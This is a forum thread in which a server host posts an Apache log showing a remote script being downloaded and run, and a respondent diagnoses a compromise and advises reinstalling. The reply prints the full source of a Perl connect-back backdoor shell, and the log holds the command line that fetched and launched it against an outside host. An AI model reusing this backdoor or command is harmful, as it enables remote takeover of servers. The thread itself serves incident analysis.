# Apache server hacked ?

## jonfr

After a recent problem with a server that I am hosting, I wanted to check if it was hacked or not. So I did check for errors, I found this in the apache log. My checking is not finished yet.

```
[Wed Jul 07 03:10:14 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations

[Wed Jul 07 11:00:07 2010] [error] [client 67.195.112.86] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt

[Wed Jul 07 11:51:24 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt

[Wed Jul 07 12:28:49 2010] [error] [client 208.80.193.39] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html

[Wed Jul 07 23:41:54 2010] [error] [client 69.58.178.29] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt

--2010-07-08 08:58:41--  http://xilografical.altervista.org/vvx/c.txt

Resolving xilografical.altervista.org... 76.76.105.44

Connecting to xilografical.altervista.org|76.76.105.44|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1967 (1.9K) [text/plain]

Saving to: `c.txt'

     0K .                                                     100% 1.55M=0.001s

2010-07-08 08:58:41 (1.55 MB/s) - `c.txt' saved [1967/1967]

sh: line 1: 15197 Killed                  perl c.txt 193.232.68.49 2121

[Fri Jul 09 22:22:07 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations

[Sat Jul 10 00:38:55 2010] [error] [client 208.80.193.34] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html

[Sat Jul 10 03:10:18 2010] [notice] Graceful restart requested, doing restart

apache2: Syntax error on line 148 of /etc/apache2/httpd.conf: Syntax error on line 4 of /etc/apache2/modules.d/70_mod_php5.conf: Cannot load /usr/lib/apache$

[Sat Jul 10 07:54:37 2010] [warn] pid file /var/run/apache2.pid overwritten -- Unclean shutdown of previous Apache run?

[Sat Jul 10 07:54:37 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.13-pl0-gentoo configured -- resuming normal operations

[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html

[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico

[Sat Jul 10 07:55:59 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico

[Sat Jul 10 07:56:06 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum

[Sat Jul 10 07:56:15 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran

[Sat Jul 10 07:56:18 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran

[Sat Jul 10 07:56:39 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum

[Sat Jul 10 11:51:25 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt

```

I am local client 192.168.1.7.

Thanks for the help.

----------

## eccerr0r

Yes this looks very suspicious.  Someone managed to find a bug in one of your scripts to get it to download c.txt and then execute it -- all bets are off now.  I'm not sure what c.txt does, but apparently someone or something killed it after being executed (quite possibly by the perpetrator...

I'd scrub the machine down.  Nothing is trustable on the machine any more.

I'd look at your access log at around the time when that file was downloaded to see what he did.

BTW:Kudos for you for actually finding this and being sceptical that it's normal.  A lot of *ix machines get left there assuming everything is fine and dandy... and then their box gets used to attack other boxes...

*sigh*

BTW: I grabbed a copy of the file c.txt:

```

#!/usr/bin/perl

use IO::Socket;

#   Priv8 ** Priv8 ** Priv8

# IRAN HACKERS SABOTAGE Connect Back Shell         

# code by:LorD

# We Are :LorD-C0d3r-NT-\x90                                           

# Email:LorD@ihsteam.com

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 32769

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system   = '/bin/bash';

$ARGC=@ARGV;

print "IHS BACK-CONNECT BACKDOOR\n\n";

if ($ARGC!=2) {

   print "Usage: $0 [Host] [Port] \n\n";

   die "Ex: $0 127.0.0.1 2121 \n";

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

print "[*] Resolving HostName\n";

print "[*] Connecting... $ARGV[0] \n";

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush();

open(STDIN, ">&SOCKET");

open(STDOUT,">&SOCKET");

open(STDERR,">&SOCKET");

print "IHS BACK-CONNECT BACKDOOR  \n\n";

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

system($system);

#EOF 

```

Yes it looks like a backdoor.  But now I'm not sure if it's still doing anything.  Either case, you should carefully audit the machine - ideally reinstall.

----------

## jonfr

This is not my computer, so I will have to discuss a reformat with the owner. There are no older logs there. I have done updates over the past 24 hours, this problems started when I was not at home, so there was little I could do at the time.

I don't find the c.txt file on my computer, and I don't know how to do a text search in linux.

I have a rule, I don't trust any computer that is connected to the internet. It does not matter what the computer in question runs as a Operating system.

----------

